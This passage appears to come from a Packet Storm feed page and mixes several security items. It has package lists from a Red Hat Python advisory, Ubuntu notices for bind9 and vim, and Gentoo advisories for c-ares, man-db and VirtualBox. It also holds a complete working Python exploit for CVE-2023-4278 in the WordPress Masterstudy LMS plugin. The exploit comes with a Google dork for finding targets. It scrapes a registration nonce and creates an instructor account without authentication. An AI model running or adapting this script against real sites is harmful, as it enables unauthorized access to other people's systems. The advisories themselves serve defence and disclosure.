python3-test-3.6.8-24.el8_2.2.i686.rpm  
python3-tkinter-3.6.8-24.el8_2.2.i686.rpm  
python3-tkinter-3.6.8-24.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

ppc64le:  
platform-python-debug-3.6.8-24.el8_2.2.ppc64le.rpm  
platform-python-devel-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-debugsource-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-idle-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-tkinter-3.6.8-24.el8_2.2.ppc64le.rpm

x86_64:  
platform-python-3.6.8-24.el8_2.2.i686.rpm  
platform-python-debug-3.6.8-24.el8_2.2.i686.rpm  
platform-python-debug-3.6.8-24.el8_2.2.x86_64.rpm  
platform-python-devel-3.6.8-24.el8_2.2.i686.rpm  
platform-python-devel-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.i686.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debugsource-3.6.8-24.el8_2.2.i686.rpm  
python3-debugsource-3.6.8-24.el8_2.2.x86_64.rpm  
python3-idle-3.6.8-24.el8_2.2.i686.rpm  
python3-idle-3.6.8-24.el8_2.2.x86_64.rpm  
python3-test-3.6.8-24.el8_2.2.i686.rpm  
python3-tkinter-3.6.8-24.el8_2.2.i686.rpm  
python3-tkinter-3.6.8-24.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

x86_64:  
platform-python-3.6.8-24.el8_2.2.i686.rpm  
platform-python-debug-3.6.8-24.el8_2.2.i686.rpm  
platform-python-debug-3.6.8-24.el8_2.2.x86_64.rpm  
platform-python-devel-3.6.8-24.el8_2.2.i686.rpm  
platform-python-devel-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.i686.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debugsource-3.6.8-24.el8_2.2.i686.rpm  
python3-debugsource-3.6.8-24.el8_2.2.x86_64.rpm  
python3-idle-3.6.8-24.el8_2.2.i686.rpm  
python3-idle-3.6.8-24.el8_2.2.x86_64.rpm  
python3-test-3.6.8-24.el8_2.2.i686.rpm  
python3-tkinter-3.6.8-24.el8_2.2.i686.rpm  
python3-tkinter-3.6.8-24.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
python3-3.6.8-24.el8_2.2.src.rpm

x86_64:  
platform-python-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.i686.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debugsource-3.6.8-24.el8_2.2.i686.rpm  
python3-debugsource-3.6.8-24.el8_2.2.x86_64.rpm  
python3-libs-3.6.8-24.el8_2.2.i686.rpm  
python3-libs-3.6.8-24.el8_2.2.x86_64.rpm  
python3-test-3.6.8-24.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
python3-3.6.8-24.el8_2.2.src.rpm

ppc64le:  
platform-python-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-debugsource-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-libs-3.6.8-24.el8_2.2.ppc64le.rpm  
python3-test-3.6.8-24.el8_2.2.ppc64le.rpm

x86_64:  
platform-python-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.i686.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debugsource-3.6.8-24.el8_2.2.i686.rpm  
python3-debugsource-3.6.8-24.el8_2.2.x86_64.rpm  
python3-libs-3.6.8-24.el8_2.2.i686.rpm  
python3-libs-3.6.8-24.el8_2.2.x86_64.rpm  
python3-test-3.6.8-24.el8_2.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
python3-3.6.8-24.el8_2.2.src.rpm

x86_64:  
platform-python-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.i686.rpm  
python3-debuginfo-3.6.8-24.el8_2.2.x86_64.rpm  
python3-debugsource-3.6.8-24.el8_2.2.i686.rpm  
python3-debugsource-3.6.8-24.el8_2.2.x86_64.rpm  
python3-libs-3.6.8-24.el8_2.2.i686.rpm  
python3-libs-3.6.8-24.el8_2.2.x86_64.rpm  
python3-test-3.6.8-24.el8_2.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-40217  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvFAAoJENzjgjWX9erEr/oQAJK/c8a60R/4GnFKIkTMACp5  
k2c7IrWri1xodP2yNLCwFqrLNb+vBWZbsTme87R6wgXHf3G1XZMNLbxKVJxAR7o3  
vdO3+HWBJZC8+824aJla25vxjPEvfgw+M4CqHt3a7nXHkSTOQhrv6TK/k3I/74S9  
da8G/I6O8XIF0ZlojpRTqHHafDppHaKzDytGzIY6U4xzYOKTQXz1cEIvTnNOVYIW  
rh6rwTZgAciQU2613lA7mctkXNgE2V9RtwgyU0mrkBLqI8HPbNGDtaiLr/7WVOcj  
Ihz+6ukg0rq3XJfEr12K3JkTdj9Mikr/ahdmBTF/O9bcSw2yqUjeQv/Z7mdFqtF4  
BKZEA0Uh3gl/tiayHVrDgfYijUgSY+O1+vYtk1vepl1U8HXufcXprv8t78Wjtx/d  
OS+Wdaku0ISPlX+jlrkM5OIZyKw97oZ38yIlq1XzhcNnKk3EBR4ajbN3nxfEyPZ1  
qdkIcrGr9dbFPVazAm3diD15CYDZHm/CLPOqwJgS7aoSHTccw3ANgGCHJyg6p/P6  
NBSxooXZrVz8AS1hvQUGU2FeJRLcBtDIHiiJwEW90JcIAPVKaienLV3Ow+qnmnO2  
XmDZ4gyCcHYl+0HmkH0y2/5LNyv73RDZmBkqnXIqc0ifGDk9Pv+U90DhSdhp5q+j  
2ak0wUJ6XE7FTAsFrsmX  
=BBPL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5528-01

WordPress Masterstudy LMS plugin version 3.0.17 suffers from an unauthenticated instructor account creation vulnerability.

    # Exploit Title:  Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation# Google Dork: inurl:/user-public-account# Date: 2023-09-04# Exploit Author: Revan Arifio# Vendor Homepage: https:/.org/plugins/masterstudy-lms-learning-management-system/# Version: <= 3.0.17# Tested on: Windows, Linux# CVE : CVE-2023-4278import requestsimport osimport reimport timebanner = """   _______      ________    ___   ___ ___  ____        _  _ ___ ______ ___    / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \      | || |__ \____  / _ \  | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____| || |_ ) |  / / (_) | | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__   _/ /  / / > _ <  | |____   \  /  | |____    / /_| |_| / /_ ___) |        | |/ /_ / / | (_) |  \_____|   \/   |______|  |____|\___/____|____/         |_|____/_/   \___/                                                                             ======================================================================================================|| Title            : Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation       |||| Author           : https://github.com/revan-ar                                                   |||| Vendor Homepage  : https:/wordpress.org/plugins/masterstudy-lms-learning-management-system/      |||| Support          : https://www.buymeacoffee.com/revan.ar                                         ||======================================================================================================"""print(banner)# get noncedef get_nonce(target):    open_target = requests.get("{}/user-public-account".format(target))    search_nonce = re.search('"stm_lms_register":"(.*?)"', open_target.text)    if search_nonce[1] != None:        return search_nonce[1]    else:        print("Failed when getting Nonce :p")# privielege escalationdef privesc(target, nonce, username, password, email):    req_data = {        "user_login":"{}".format(username),        "user_email":"{}".format(email),        "user_password":"{}".format(password),        "user_password_re":"{}".format(password),        "become_instructor":True,        "privacy_policy":True,        "degree":"",        "expertize":"",        "auditory":"",        "additional":[],        "additional_instructors":[],        "profile_default_fields_for_register":[],        "redirect_page":"{}/user-account/".format(target)        }    start = requests.post("{}/wp-admin/admin-ajax.php?action=stm_lms_register&nonce={}".format(target, nonce), json = req_data)    if start.status_code == 200:        print("[+] Exploit Success !!")    else:        print("[+] Exploit Failed :p")# URL targettarget = input("[+] URL Target: ")print("[+] Starting Exploit")plugin_check = requests.get("{}/wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt".format(target))plugin_version = re.search("Stable tag: (.+)", plugin_check.text)int_version = plugin_version[1].replace(".", "")time.sleep(1)if int(int_version) < 3018:    print("[+] Target is Vulnerable !!")    # Credential    email =  input("[+] Email: ")    username =  input("[+] Username: ")    password =  input("[+] Password: ")    time.sleep(1)    print("[+] Getting Nonce...")    get_nonce = get_nonce(target)    # Get Nonce    if get_nonce != None:        print("[+] Success Getting Nonce: {}".format(get_nonce))        time.sleep(1)        # Start PrivEsc        privesc(target, get_nonce, username, password, email)    # ----------------------------------    else:    print("[+] Target is NOT Vulnerable :p")

WordPress Masterstudy LMS 3.0.17 Account Creation

Ubuntu Security Notice 6421-1 - It was discovered that Bind incorrectly handled certain control channel messages. A remote attacker with access to the control channel could possibly use this issue to cause Bind to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6421-1  
October 09, 2023

bind9 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Bind could be made to crash if it received specially crafted network   
traffic.

Software Description:  
- bind9: Internet Domain Name Server

Details:

It was discovered that Bind incorrectly handled certain control channel  
messages. A remote attacker with access to the control channel could  
possibly use this issue to cause Bind to crash, resulting in a denial of  
service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   bind9 1:9.11.3+dfsg-1ubuntu1.19+esm2  
   libbind9-160                    1:9.11.3+dfsg-1ubuntu1.19+esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   bind9 1:9.10.3.dfsg.P4-8ubuntu1.19+esm7  
   libbind9-140  1:9.10.3.dfsg.P4-8ubuntu1.19+esm7

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   bind9 1:9.9.5.dfsg-3ubuntu0.19+esm11  
   libbind9-90                     1:9.9.5.dfsg-3ubuntu0.19+esm11

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6421-1  
   CVE-2023-3341

Ubuntu Security Notice USN-6421-1

Ubuntu Security Notice 6420-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS. It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possibly execute arbitrary code. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    =========================================================================Ubuntu Security Notice USN-6420-1October 09, 2023vim vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possibly execute arbitrary code. Thisissue only affected Ubuntu 22.04 LTS. (CVE-2022-3235, CVE-2022-3278,CVE-2022-3297, CVE-2022-3491)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possibly execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04LTS. (CVE-2022-3352, CVE-2022-4292)It was discovered that Vim incorrectly handled memory when replacing invirtualedit mode. An attacker could possibly use this issue to cause adenial of service. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04LTS, and Ubuntu 22.04 LTS. (CVE-2022-3234)It was discovered that Vim incorrectly handled memory when autocmd changesmark. An attacker could possibly use this issue to cause a denial ofservice. (CVE-2022-3256)It was discovered that Vim did not properly perform checks on array indexwith negative width window. An attacker could possibly use this issue tocause a denial of service, or execute arbitrary code. (CVE-2022-3324)It was discovered that Vim did not properly perform checks on a put commandcolumn with a visual block. An attacker could possibly use this issue tocause a denial of service. This issue only affected Ubuntu 20.04 LTS, andUbuntu 22.04 LTS. (CVE-2022-3520)It was discovered that Vim incorrectly handled memory when using autocommandto open a window. An attacker could possibly use this issue to cause adenial of service. (CVE-2022-3591)It was discovered that Vim incorrectly handled memory when updating bufferof the component autocmd handler. An attacker could possibly use this issueto cause a denial of service. This issue only affected Ubuntu 20.04 LTS,and Ubuntu 22.04 LTS. (CVE-2022-3705)It was discovered that Vim incorrectly handled floating point comparisonwith incorrect operator. An attacker could possibly use this issue to causea denial of service. This issue only affected Ubuntu 20.04 LTS. and Ubuntu22.04 LTS. (CVE-2022-4293)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.12  vim-athena                      2:8.2.3995-1ubuntu2.12  vim-gtk                         2:8.2.3995-1ubuntu2.12  vim-gtk3                        2:8.2.3995-1ubuntu2.12  vim-nox                         2:8.2.3995-1ubuntu2.12  vim-tiny                        2:8.2.3995-1ubuntu2.12  xxd                             2:8.2.3995-1ubuntu2.12Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.18  vim-athena                      2:8.1.2269-1ubuntu5.18  vim-gtk                         2:8.1.2269-1ubuntu5.18  vim-gtk3                        2:8.1.2269-1ubuntu5.18  vim-nox                         2:8.1.2269-1ubuntu5.18  vim-tiny                        2:8.1.2269-1ubuntu5.18  xxd                             2:8.1.2269-1ubuntu5.18Ubuntu 18.04 LTS (Available with Ubuntu Pro):  vim                             2:8.0.1453-1ubuntu1.13+esm5  vim-athena                      2:8.0.1453-1ubuntu1.13+esm5  vim-gtk                         2:8.0.1453-1ubuntu1.13+esm5  vim-gtk3                        2:8.0.1453-1ubuntu1.13+esm5  vim-nox                         2:8.0.1453-1ubuntu1.13+esm5  vim-tiny                        2:8.0.1453-1ubuntu1.13+esm5  xxd                             2:8.0.1453-1ubuntu1.13+esm5Ubuntu 14.04 LTS (Available with Ubuntu Pro):  vim                             2:7.4.052-1ubuntu3.1+esm13  vim-athena                      2:7.4.052-1ubuntu3.1+esm13  vim-gnome                       2:7.4.052-1ubuntu3.1+esm13  vim-gtk                         2:7.4.052-1ubuntu3.1+esm13  vim-nox                         2:7.4.052-1ubuntu3.1+esm13  vim-tiny                        2:7.4.052-1ubuntu3.1+esm13In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6420-1  CVE-2022-3234, CVE-2022-3235, CVE-2022-3256, CVE-2022-3278,  CVE-2022-3297, CVE-2022-3324, CVE-2022-3352, CVE-2022-3491,  CVE-2022-3520, CVE-2022-3591, CVE-2022-3705, CVE-2022-4292,  CVE-2022-4293Package Information:  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.12  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.18

Ubuntu Security Notice USN-6420-1

Gentoo Linux Security Advisory 202310-9 - Multiple vulnerabilities have been discovered in c-ares the worst of which could result in Denial of Service. Versions greater than or equal to 1.19.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: c-ares: Multiple Vulnerabilities  
     Date: October 08, 2023  
     Bugs: #906964  
       ID: 202310-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in c-ares the worst of  
which could result in Denial of Service.

Background  
=========  
c-ares is a C library for asynchronous DNS requests (including name  
resolves).

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
net-dns/c-ares  < 1.19.1      >= 1.19.1

Description  
==========  
Multiple vulnerabilities have been discovered in c-ares. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All c-ares users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-dns/c-ares-1.19.1"

References  
=========  
[ 1 ] CVE-2023-31124  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31124  
[ 2 ] CVE-2023-31130  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31130  
[ 3 ] CVE-2023-31147  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31147  
[ 4 ] CVE-2023-32067  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32067

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-09

Gentoo Linux Security Advisory 202310-8 - A root privilege escalation through setuid executable and cron job has been discovered in man-db. Versions greater than or equal to 2.8.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: man-db: privilege escalation  
     Date: October 08, 2023  
     Bugs: #662438  
       ID: 202310-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A root privilege escalation through setuid executable and cron job has  
been discovered in man-db.

Background  
=========  
man-db is a man replacement that utilizes BerkeleyDB instead of flat  
files.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
sys-apps/man-db  < 2.8.5       >= 2.8.5

Description  
==========  
A root privilege escalation through setuid executable and cron job has  
been discovered in man-db. Please review the CVE identifier referenced  
below for details.

Impact  
=====  
A local user with access to the man user or group can elevate privileges  
to root.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All man-db users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/man-db-2.8.5"

References  
=========  
[ 1 ] CVE-2018-25078  
      https://nvd.nist.gov/vuln/detail/CVE-2018-25078

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-08

Gentoo Linux Security Advisory 202310-7 - Multiple vulnerabilities have been discovered in VirtualBox, leading to compromise of VirtualBox. Versions greater than or equal to 7.0.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: October 08, 2023  
     Bugs: #891327  
       ID: 202310-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in VirtualBox, leading to  
compomise of VirtualBox.

Background  
=========  
VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
================  
Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
app-emulation/virtualbox  < 7.0.6       >= 7.0.6

Description  
==========  
Multiple vulnerabilities have been discovered in Oracle VirtualBox, the  
worst of which may lead to VirtualBox compromise by an attacker with  
network access.

Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Oracle VirtualBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-7.0.6"

If you still need to use VirtualBox 6:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-6.1.46" "=app-emulation/virtualbox-6*"

References  
=========  
[ 1 ] CVE-2023-21884  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21884  
[ 2 ] CVE-2023-21885  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21885  
[ 3 ] CVE-2023-21886  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21886  
[ 4 ] CVE-2023-21889  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21889  
[ 5 ] CVE-2023-21898  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21898  
[ 6 ] CVE-2023-21899  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21899

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm